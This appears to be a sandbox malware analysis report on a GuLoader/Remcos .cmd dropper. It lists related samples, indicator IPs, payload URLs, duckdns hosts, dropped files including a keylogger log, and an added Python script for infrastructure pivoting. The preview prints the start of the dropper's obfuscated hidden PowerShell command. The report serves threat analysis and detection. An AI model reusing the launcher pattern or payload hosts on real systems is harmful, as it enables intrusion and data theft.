  INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe | malicious | Remcos | 178.237.33.50
  Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 178.237.33.50
  202404294766578200.xlam.xlsx | malicious | Remcos | 178.237.33.50
  PLOCMR-002 Dane dotyczące dokumentów i towarów.hta | malicious | GuLoader, Remcos | 178.237.33.50
  https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff | malicious | Remcos | 178.237.33.50
  nU7Z8sPyvf.rtf | malicious | Remcos | 178.237.33.50
  Tapril-30-receipt.vbs | malicious | Remcos | 178.237.33.50
  Tapril-30-receipt.vbs (second analysis) | malicious | Remcos | 178.237.33.50
  bYPQHxUNMF.exe | malicious | Remcos | 178.237.33.50
JA3 Fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)

28a2c9bd18a11de089ef85a160da29e4
  http://cuts.kr/APFXM | malicious | Unknown | 13.85.23.86
  https://gamma.app/docs/Untitled-9umekc4egyknsob | malicious | HTMLPhisher | 13.85.23.86
  9d565bee-e6ce-1842-e729-b0df8f08ed34.eml | malicious | HTMLPhisher | 13.85.23.86
  http://jimdo-storage.global.ssl.fastly.net/file/a45fef49-77a5-4e4b-b081-f19dd1b9626e/b0aa30c8-07ba-4acf-a6e6-856aaa7da320.pdf | malicious | Unknown | 13.85.23.86
  (same URL, three further analyses) | malicious | Unknown | 13.85.23.86
  https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.pt | malicious | HTMLPhisher | 13.85.23.86
  http://collectionsystem.veconinter.com:8002/Default.aspx?Pais=TMVb4l9krDsyWtcOACvZcw==&Tipo=5vw2xkejLdEpXNK8ckiYpA==&Val=Ju61jJ3lX3gIjnPLX+eDdQ==&Id=3243049&VR=1 | malicious | Unknown | 13.85.23.86
  opp.scr.exe | malicious | FormBook | 13.85.23.86

37f463bf4616ecd445d4a1937da06e19
  5801.xls | malicious | Unknown | 46.254.34.12
  RFQ-LOTUS 2024.exe | malicious | FormBook, GuLoader | 46.254.34.12
  325445263.img | malicious | Unknown | 46.254.34.12
  Fact.NaturgyID300S220404024NOPA22442452256676545245PDR2PD04LF.msi | malicious | Unknown | 46.254.34.12
  Purchase Order05022024.exe | malicious | AgentTesla, GuLoader | 46.254.34.12
  Notice.xls | malicious | Unknown | 46.254.34.12
  JlvRdFpwOD.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT | 46.254.34.12
  00389692222221902.exe | malicious | FormBook, GuLoader | 46.254.34.12
  Evgh. rvs Armenia. 30.04.2024.exe | malicious | GuLoader, Remcos | 46.254.34.12
  DATASHEET rfq.exe | malicious | GuLoader | 46.254.34.12
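The Context tables above show which earlier analyses touched the same IPs, hostnames, ASNs and JA3 fingerprints as this sample. The script below is an added example and is not part of the Joe Sandbox report: it transcribes a subset of those rows into a small data structure, ranks the associated samples by how much infrastructure they share with this one, records the IPs each hostname resolved to across analyses, and tags each indicator with a heuristic role. The weights, the low-signal list and the role heuristics are this example's own assumptions; the report states none of them.

```python
"""Infrastructure pivot over a sandbox report's Context tables.

Added example, not part of the Joe Sandbox report. CONTEXT is a subset
transcribed from the IPs / Domains / ASNs / JA3 tables of this report; the
weights, the low-signal list and the role heuristics are assumptions of this
example and are not stated anywhere in the report.
"""
from collections import defaultdict
import ipaddress

# Short aliases for sample names that recur across the tables.
PLOCMR = "PLOCMR-002 Dane dotyczące dokumentów i towarów.hta"
DOC = "doc.bat"
DHL = "DHL_ES567436735845755676678877988975877.vbs"
BRUFEN = "BRUFEN ORDER VAC442_7467247728478134247.vbs"
GR = {"GuLoader", "Remcos"}
FGR = {"FormBook", "GuLoader", "Remcos"}

# (kind, indicator) -> [(sample, threat families, Context column)].
# An empty family set stands for the report's "Unknown".
CONTEXT = {
    ("ip", "87.121.105.163"): [
        (PLOCMR, GR, "87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin"),
        (DOC, GR, "87.121.105.163/Sylvester.dwp"),
        (DHL, FGR, "87.121.105.163/PUzAKuQ35.bin"),
    ],
    ("ip", "45.88.90.110"): [(PLOCMR, GR, ""), (DOC, GR, ""), (DHL, FGR, ""), (BRUFEN, GR, "")],
    ("ip", "46.254.34.12"): [
        (DOC, GR, "www.duelvalenza.it/fnuRRYIa56.bin"),
        (DHL, FGR, "www.duelvalenza.it/FIPWKWOaFXJGe178.bin"),
    ],
    ("ip", "239.255.255.250"): [("SAL_000268_DOM.xls", set(), ""), ("5801.xls", set(), "")],
    ("domain", "google.com"): [
        ("SAL_000268_DOM.xls", set(), "172.217.1.4"),
        ("01105751.vbs", {"FormBook", "GuLoader"}, "142.251.40.206"),
    ],
    ("domain", "jgbours284hawara01.duckdns.org"): [
        (PLOCMR, GR, "192.169.69.26"), (DHL, FGR, "45.88.90.110"), (BRUFEN, GR, "45.88.90.110"),
    ],
    ("domain", "jgbours284hawara02.duckdns.org"): [(PLOCMR, GR, "45.88.90.110"), (DOC, GR, "45.88.90.110")],
    ("domain", "geoplugin.net"): [
        ("GVV.exe", {"Remcos"}, "178.237.33.50"), (PLOCMR, GR, "178.237.33.50"), (DOC, GR, "178.237.33.50"),
    ],
    ("asn", "NET1-ASBG"): [("01105751.vbs", {"FormBook", "GuLoader"}, "87.121.105.54"), (PLOCMR, GR, "87.121.105.163")],
    ("asn", "LVLT-10753US"): [
        (PLOCMR, GR, "45.88.90.110"), (DOC, GR, "45.88.90.110"), ("957URl9ErB.exe", {"Socks5Systemz"}, "45.88.90.160"),
    ],
    ("ja3", "37f463bf4616ecd445d4a1937da06e19"): [
        ("5801.xls", set(), "46.254.34.12"), ("DATASHEET rfq.exe", {"GuLoader"}, "46.254.34.12"),
    ],
}

# Weight per indicator kind (assumption): a shared IP or hostname says far more
# than a shared hosting provider or a TLS client fingerprint shared by many stacks.
WEIGHTS = {"ip": 3, "domain": 3, "asn": 1, "ja3": 1}

# Indicators any Windows host touches; overlap on them is not evidence (assumption).
LOW_SIGNAL = {
    ("ip", "239.255.255.250"),  # SSDP multicast address
    ("domain", "google.com"),   # connectivity check, not attacker infrastructure
}


def score_overlap(context=CONTEXT, weights=WEIGHTS, low_signal=LOW_SIGNAL):
    """Rank prior samples by the weighted number of indicators they share with
    this one. Returns [(sample, score, sorted shared indicators)], best first."""
    scores, shared = defaultdict(int), defaultdict(set)
    for (kind, ind), hits in context.items():
        w = 0 if (kind, ind) in low_signal else weights[kind]
        for sample, _families, _ctx in hits:
            scores[sample] += w
            if w:
                shared[sample].add(ind)
    ranked = sorted(scores, key=lambda s: (-scores[s], s))
    return [(s, scores[s], sorted(shared[s])) for s in ranked]


def resolutions(context=CONTEXT):
    """Hostname -> set of IPs it resolved to across the associated analyses
    (the Context column of the Domains table)."""
    seen = defaultdict(set)
    for (kind, ind), hits in context.items():
        if kind != "domain":
            continue
        for _sample, _families, ctx in hits:
            try:
                seen[ind].add(str(ipaddress.ip_address(ctx)))
            except ValueError:  # empty or non-IP context column
                pass
    return dict(seen)


def indicator_roles(context=CONTEXT):
    """Heuristic tags per indicator: serves files (a URL path in Context),
    dynamic-DNS hostname, and the family every associated sample has in common."""
    roles = {}
    for (kind, ind), hits in context.items():
        tags = []
        if any("/" in ctx for _s, _f, ctx in hits):
            tags.append("payload host")
        if kind == "domain" and ind.endswith(".duckdns.org"):
            tags.append("dynamic DNS")
        common = set.intersection(*(set(f) for _s, f, _c in hits))
        if common:
            tags.append("common family: " + ", ".join(sorted(common)))
        roles[ind] = tags
    return roles


if __name__ == "__main__":
    for sample, score, inds in score_overlap():
        print(f"{score:3d}  {sample}  <- {', '.join(inds) or '-'}")
```

Run as-is, the ranking puts the PLOCMR-002 .hta and doc.bat analyses at the top, since they share the payload host 87.121.105.163, the IP 45.88.90.110, the duckdns hostnames and geoplugin.net with this sample, while the .xls analyses that only share 239.255.255.250 (SSDP multicast, which every Windows host emits) and google.com score zero. Two caveats the tables support: jgbours284hawara01.duckdns.org resolved to 192.169.69.26 in some analyses and 45.88.90.110 in others, so the dynamic-DNS hostname, not the IP of the day, is the durable block; and ASN or JA3 overlap alone is weak evidence, since NET1-ASBG also hosts unrelated Mirai ELF samples and the 37f463bf... fingerprint spans AgentTesla, RedLine and other families.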
Dropped Files
No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.3264036310625809
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrG:KooCEYhgYEL0In
MD5: 612365C942234C10AA53212A4E0CEA74
SHA1: F9E6A9AA38BF317C675B48D0DBD02AF2B5CCF363
SHA-256: 2794D5559B9816338176739CB7A0E377BE59B005F7C966EBB7A561044C83FC74
SHA-512: 7B8BFC8CA04A2DFCEC538F6FF691496090D0230363CB1377796391E9F1D04F2E6126D6343FF0B5F07BF49B91E39ECABF5DBAFA0345A1603C8FB05DAD9046D9E2
Malicious: false
Preview: z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0xa4c44316, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.42214561796448674
Encrypted: false
SSDEEP: 1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5: 7F1795C99BE72D4323EE9483367E53E1
SHA1: AD3925BE649BC8576596E7D4DA97EDD3B0FAC69C
SHA-256: DD9B6BE4360E0F8ACA93A331AD2E85C0BD6A38B88B1DF08E85B066D0AF206E56
SHA-512: 109E152624C0EDA506E5B1A226FFB1F76558378D33195A8DCE265EDBE7E65C4CB5CF938034265046B69830A04831219B08B366655ECB8E8B2510D41FAAE557B1
Malicious: false
Preview: ..C.... .......A.......X\...;...{......................0.!..........{A......|e.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................H..p.....|.....................w.....|e..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07735018400703877
Encrypted: false
SSDEEP: 3:btyYec5SuGjjn13a/SY+H/AllcVO/lnlZMxZNQl:4zxuGj53qFQAOewk
MD5: C8AEFFC9265D039D42C0F661C60D9CF8
SHA1: 346C243F5D0FB677A78AB648C3CC19E50463B9FF
SHA-256: A1DF2BCF55B91413F2C83B4DE0E8CB76E66D72415A493785E8E291BE955E07AC
SHA-512: C1BAF9E5BDCC8BB3F38413961E3EA44B59E3A2844C764FFED822AAD1609E84AEBB0316856A7D1F2965D2E4261EE5AAEC8A29B49E830E82C7C4CD0ABB9BC14BD5
Malicious: false
Preview: .H.u.....................................;...{.......|e......{A..............{A......{A..........{A]...................w.....|e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):965
                                                                            Entropy (8bit):5.023840386167536
                                                                            Encrypted:false
                                                                            SSDEEP:12:tkhXkmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qhXldRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                            MD5:35B07141970464FE1515126EE76D86C8
                                                                            SHA1:BF560D7B92845B6DE04C7716CE1B62E4637E62E5
                                                                            SHA-256:B2A7CD5C3E618A0ADFAA1B65E49A88B29060CA7C165DB516C5B32D376A12D4E0
                                                                            SHA-512:D79DA10444FA33DDD7CE1DC12649D16E3E50C8E7E956487A62D9BAFC887F0C1B6B3761AE0E01ED5F72D86E078AD3897DC97A99F625E8FECA60F683D720C9BCD0
                                                                            Malicious:false
                                                                            Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):11608
                                                                            Entropy (8bit):4.886255615007755
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                            Malicious:false
                                                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6221
                                                                            Entropy (8bit):3.730626427732995
                                                                            Encrypted:false
                                                                            SSDEEP:48:mOe3MiLPr3C4U28djQukvhkvklCywhmdjUU8lRBSogZoEDUU8l4BSogZow1:PJi33CxHdNkvhkvCCt+UU88HFUU8bHv
                                                                            MD5:073D19E4C7B469C55105F365120DA656
                                                                            SHA1:42EE0268A8DBE6E4BE553BFC03BF400AF5DD9FC6
                                                                            SHA-256:EA8D300713D490F668636F6A30017D59E9CCE214D2E64448EB9C7FFC9BD552FB
                                                                            SHA-512:F78DBF5F117C825F6841DB170DE74A40812D3D4A1AC103B1AABDB6AC2C6A0EC199DBE6E69A3DA42B52CEF4F2FF55B325DA7A25A903F24B72A262DBAABE615B32
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ...-/.v.....^.S....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....C..O......S........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.z...........................%..A.p.p.D.a.t.a...B.V.1......X.z..Roaming.@......CW.^.X.z............................1.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.z..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..........................=E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.z....Q...........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):6221
                                                                            Entropy (8bit):3.730626427732995
                                                                            Encrypted:false
                                                                            SSDEEP:48:mOe3MiLPr3C4U28djQukvhkvklCywhmdjUU8lRBSogZoEDUU8l4BSogZow1:PJi33CxHdNkvhkvCCt+UU88HFUU8bHv
                                                                            MD5:073D19E4C7B469C55105F365120DA656
                                                                            SHA1:42EE0268A8DBE6E4BE553BFC03BF400AF5DD9FC6
                                                                            SHA-256:EA8D300713D490F668636F6A30017D59E9CCE214D2E64448EB9C7FFC9BD552FB
                                                                            SHA-512:F78DBF5F117C825F6841DB170DE74A40812D3D4A1AC103B1AABDB6AC2C6A0EC199DBE6E69A3DA42B52CEF4F2FF55B325DA7A25A903F24B72A262DBAABE615B32
                                                                            Malicious:false
                                                                            Preview:...................................FL..................F.".. ...-/.v.....^.S....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....C..O......S........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.z...........................%..A.p.p.D.a.t.a...B.V.1......X.z..Roaming.@......CW.^.X.z............................1.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.X.z..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWO`..Windows.@......CW.^DWO`..........................=E..W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.X.z....Q...........
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):434544
                                                                            Entropy (8bit):5.9769967979381535
                                                                            Encrypted:false
                                                                            SSDEEP:6144:NBXoBavqRevWWBngpxZwxLIrQN2VmHlHrNvKNo4teKyad8019ebiaHjK:NlogO5Wdg/qxLIsN2VwHrNt4tU8sXHjK
                                                                            MD5:9DD669D385B1E1C723A1A9F0D2DB8998
                                                                            SHA1:E14218E850F50F64BCD4C3F68EBCFE483B1F5F45
                                                                            SHA-256:3170F4AE0528F9AC45ADD13828E68C6B5C6E17755F94DA373761CBDDF1F19478
                                                                            SHA-512:8D001EB7D0E2C3C85C3DD536FAA89F565F8978FA24BE8EFCCAB88B7C6E4F33D3BF870F6B71AC2FB456DB9D619A8966A12BD7113CC97F44F39A9E3E52661DF1BD
                                                                            Malicious:false
                                                                            Preview:
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):476
                                                                            Entropy (8bit):3.5023161313492417
                                                                            Encrypted:false
                                                                            SSDEEP:6:6lDC5YcIeeDAlMlDeljlR1SlDelb+SkyGkNlw+SkSX81AEl4lFcUyAe5UlDelFRk:6lWecmlujcluqUNvsvXHe5Ulu8luubW+
                                                                            MD5:874E26D495FB6A444AFECB842C40F4EB
                                                                            SHA1:C86FCFC535D4D773EA3A28F8847D1A6E68DFE24B
                                                                            SHA-256:BC18251F107D6A8FB8AA1DFF6117A0105B675277499655F0BDA59508398492D8
                                                                            SHA-512:4F48796904702A5B8720482539FD7DB6C2B95A79CBB170487057C1CB2B2953B7679A13E5B1A47491D66367ED9147FA8EC058486EE5BA348A39F5749EEDFC5F40
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\mvourhjs.dat, Author: Joe Security
                                                                            Preview:....[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.1. .R.u.n.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.5. .c.:.\.w.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.W.i.n.d.o.w.s.P.o.w.e.r.S.h.e.l.l.\.v.1...0.\.p.o.w.e.r.s.h.e.l.l...e.x.].....[.W.i.n.].r.....[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.5. .R.u.n.].........[.2.0.2.4./.0.5./.0.2. .1.7.:.2.2.:.1.6. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            File type:ASCII text, with very long lines (5881), with no line terminators
                                                                            Entropy (8bit):5.317909268152527
                                                                            TrID:
                                                                              File name:Teklif talebi BAKVENTA-BAKUUsurpationens.cmd
                                                                              File size:5'881 bytes
                                                                              MD5:69288c7e16a8ce2177346b2c62231603
                                                                              SHA1:87f0dad6634d4e6bedad3b505adb6c509fdc5f03
                                                                              SHA256:b523b20d9df02eaf3cdbb3babbc50ac7cea1889c7a3f561d586b001c02615f8a
                                                                              SHA512:2b4035d3c147b53a28514d6ae03224ab16a68d6db122d213bd59f9bc85858bf74a26b57e3a4cead6a996b2dcdb530d7a669e72b79ee67d4f725e5dcbdc6306ef
                                                                              SSDEEP:96:W2J7XNnRpI3qk7SSeg72yJjXrGMD5ZIYDBFSxGf1uTiEVc/W5EyQcvckuh:h5twqk7SSN7bBZHFs1DV8YXtcD
                                                                              TLSH:D2C16DAF66E783AC04C42F558A0AC3852F4DC526330B1A4C059649A36DABE3E5CFDF4C
                                                                              File Content Preview:start /min powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $C
                                                                              Icon Hash:9686878b929a9886
                                                                              Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                                              May 2, 2024 17:20:50.624027014 CEST  49678        443        192.168.2.4     104.46.162.224
                                                                              May 2, 2024 17:20:52.374003887 CEST  49675        443        192.168.2.4     173.222.162.32
                                                                              May 2, 2024 17:20:57.679776907 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:57.851490974 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:57.851560116 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:57.851933002 CEST  49730        80         192.168.2.4     87.121.105.163
                                                                              May 2, 2024 17:20:58.018938065 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019577980 CEST  80           49730      87.121.105.163  192.168.2.4
                                                                              May 2, 2024 17:20:58.019593000 CEST  80           49730      87.121.105.163  192.168.2.4
